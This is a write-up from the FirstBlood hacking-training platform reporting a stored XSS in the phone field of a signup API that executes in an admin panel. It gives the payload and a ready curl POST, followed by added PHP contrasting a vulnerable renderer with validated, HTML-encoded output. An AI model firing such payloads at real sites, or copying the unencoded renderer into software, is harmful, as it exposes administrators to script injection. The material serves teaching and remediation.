FirstBlood-#1020 — Stored XSS on drpanel
This issue was discovered on FirstBlood v3
On 2022-12-08, lumbridge7 Level 4 reported:
Hello firstblood team!
Summary
The API endpoint that handles the request on https://5e47966c53a3-lumbridge7.a.firstbloodhackers.com/hackerback.html to join an event doesn't properly sanitize the input on the phone
parameter. While it is not possible to insert anything other than numbers through the GUI, an attacker can still manually craft the POST request using malicious JS code as the phone value.
Steps to reproduce
- Make a POST request at 5e47966c53a3-lumbridge7.a.firstbloodhackers.com/api/hackerback.php with the payload
full_name=StoredXSS&phone=<img src=x onerror=confirm(document.domain)>&submit=Signup
- Log in to the drpanel
Curl request:
curl -X POST 'https://5e47966c53a3-lumbridge7.a.firstbloodhackers.com/api/hackerback.php' -H "Content-Type: application/x-www-form-urlencoded" -d "full_name=StoredXSS&phone=<img%20src=x%20onerror=confirm(document.domain)>&submit=Signup"
POC
P1 CRITICAL
Endpoint: /api/hackerback.php
Parameter: phone
Payload: <img src=x onerror=confirm(document.domain)>
FirstBlood ID: 59
Vulnerability Type: Stored XSS
It is possible to execute XSS against the admin via the PHONE parameter on /api/hackerback.php. The developer thought setting the input type to "tel" would prevent users from entering malicious payloads.
Creator & Administrator
Congratulations, you were the third researcher to discover this!
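The root cause noted above is that `type="tel"` only constrains the browser's form widget, not what the server accepts; a hand-crafted POST arrives at /api/hackerback.php unchanged. The following PHP is an added illustration of the defensive pattern (server-side validation on input, HTML encoding on output) and is not FirstBlood's own code. The function names, the phone-number regex and the table-row rendering are assumptions made for this example; the test value is the payload from the report.

```php
<?php
// Added example (not FirstBlood's code): server-side handling for the
// `phone` parameter of /api/hackerback.php. The HTML `type="tel"` attribute
// only constrains the browser's form UI; a hand-crafted POST bypasses it,
// so validation and output encoding must happen on the server.

// Reject anything that is not a plausible phone number. Allowed: optional
// leading '+', then 6-20 characters drawn from digits, spaces, dots,
// dashes and parentheses. The exact pattern is an assumption for this example.
function isValidPhone(string $phone): bool
{
    return preg_match('/^\+?[0-9][0-9 .()-]{5,19}$/', $phone) === 1;
}

// Encode a value for insertion into HTML text or a double-quoted attribute,
// so stored data can never be interpreted as markup when drpanel renders it.
function escapeForHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Vulnerable pattern (what the report describes): the submitted value is
// stored as received and later echoed unencoded into the admin panel.
function renderRowVulnerable(string $fullName, string $phone): string
{
    return "<tr><td>$fullName</td><td>$phone</td></tr>";
}

// Hardened input side: validate before anything is stored.
function handleSignup(array $post): array
{
    $fullName = trim((string)($post['full_name'] ?? ''));
    $phone    = trim((string)($post['phone'] ?? ''));

    if ($fullName === '' || mb_strlen($fullName) > 100) {
        return ['ok' => false, 'error' => 'invalid full_name'];
    }
    if (!isValidPhone($phone)) {
        return ['ok' => false, 'error' => 'invalid phone'];
    }
    // Persist $fullName / $phone here with a prepared statement (omitted).
    return ['ok' => true, 'full_name' => $fullName, 'phone' => $phone];
}

// Hardened output side: encode every stored field when building the panel,
// so even a value that slipped past validation cannot become markup.
function renderRowSafe(string $fullName, string $phone): string
{
    return '<tr><td>' . escapeForHtml($fullName) . '</td><td>'
         . escapeForHtml($phone) . '</td></tr>';
}

// Demonstration with the payload from the report (constructed request body).
$payload = '<img src=x onerror=confirm(document.domain)>';
$result  = handleSignup(['full_name' => 'StoredXSS', 'phone' => $payload, 'submit' => 'Signup']);
echo $result['ok'] ? 'accepted' : 'rejected: ' . $result['error'], PHP_EOL;

// Contrast the two renderers on the same stored values.
echo renderRowVulnerable('StoredXSS', $payload), PHP_EOL;
echo renderRowSafe('StoredXSS', $payload), PHP_EOL;
```

Both layers matter: the validator stops the value at the API boundary, and the output encoder protects the admin view against any record that was inserted by another path (an older import, a direct database edit, a future endpoint that forgets to validate).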